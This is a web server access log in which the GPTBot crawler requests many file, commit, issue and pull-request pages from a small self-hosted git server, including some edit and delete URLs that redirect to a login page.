git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=source" [Client 74.7.227.38] [Length 122739] [Gzip 7.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:19:22:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=source" [Client 74.7.227.38] [Length 123726] [Gzip 7.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:19:22:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=rendered" [Client 74.7.227.38] [Length 72702] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:19:22:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=source" [Client 74.7.227.38] [Length 123728] [Gzip 7.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:19:22:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10063] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:22:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10240] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:22:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:22:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&sort=latest&state=open&type=all" -[17/Feb/2026:19:22:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:22:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:22:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&state=open&type=all" -[17/Feb/2026:19:22:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:22:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?state=closed&type=all" [Client 74.7.227.38] [Length 9950] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls" -[17/Feb/2026:19:22:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=source" [Client 74.7.227.38] [Length 11365] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:19:22:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/.vscode/tasks.json?display=rendered" [Client 74.7.227.38] [Length 11004] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:19:22:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 11241] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:19:22:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/Analysis-00.toc?display=rendered" [Client 74.7.227.38] [Length 11171] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/Analysis-00.toc" -[17/Feb/2026:19:22:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:22:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:22:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:22:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10056] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:22:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&state=open&type=all" -[17/Feb/2026:19:22:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10236] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:22:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10068] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:22:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10238] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:22:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10069] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:22:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:19:22:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:19:22:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o?display=rendered" [Client 74.7.227.38] [Length 11249] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:19:22:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:19:22:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:19:22:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 9869] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:19:22:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 28704] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:19:22:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 949] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:19:22:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10240] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" -[17/Feb/2026:19:22:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10237] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:22:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10243] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:22:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10241] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:22:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10240] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:22:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md?display=source" [Client 74.7.227.38] [Length 21787] [Gzip 5.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" -[17/Feb/2026:19:22:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md?display=rendered" [Client 74.7.227.38] [Length 16938] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" -[17/Feb/2026:19:22:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md?display=source" [Client 74.7.227.38] [Length 21818] [Gzip 5.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" -[17/Feb/2026:19:22:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md?display=rendered" [Client 74.7.227.38] [Length 16972] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" -[17/Feb/2026:19:22:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/krx_gold_fetcher.cpython-312.pyc?display=rendered" [Client 74.7.227.38] [Length 10955] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/krx_gold_fetcher.cpython-312.pyc" -[17/Feb/2026:19:22:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/api_fetcher.cpython-312.pyc?display=rendered" [Client 74.7.227.38] [Length 10947] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/api_fetcher.cpython-312.pyc" -[17/Feb/2026:19:22:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/krx_gold_fetcher.cpython-312.pyc?display=rendered" [Client 74.7.227.38] [Length 10924] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/krx_gold_fetcher.cpython-312.pyc" -[17/Feb/2026:19:22:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/api_fetcher.cpython-312.pyc?display=rendered" [Client 74.7.227.38] [Length 10916] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/api_fetcher.cpython-312.pyc" -[17/Feb/2026:19:22:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/uvicorn?display=source" [Client 74.7.227.38] [Length 11771] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/uvicorn" -[17/Feb/2026:19:22:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate.csh?display=source" [Client 74.7.227.38] [Length 12379] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate.csh" -[17/Feb/2026:19:22:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10228] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:22:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/.vscode/tasks.json?display=rendered" [Client 74.7.227.38] [Length 11005] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 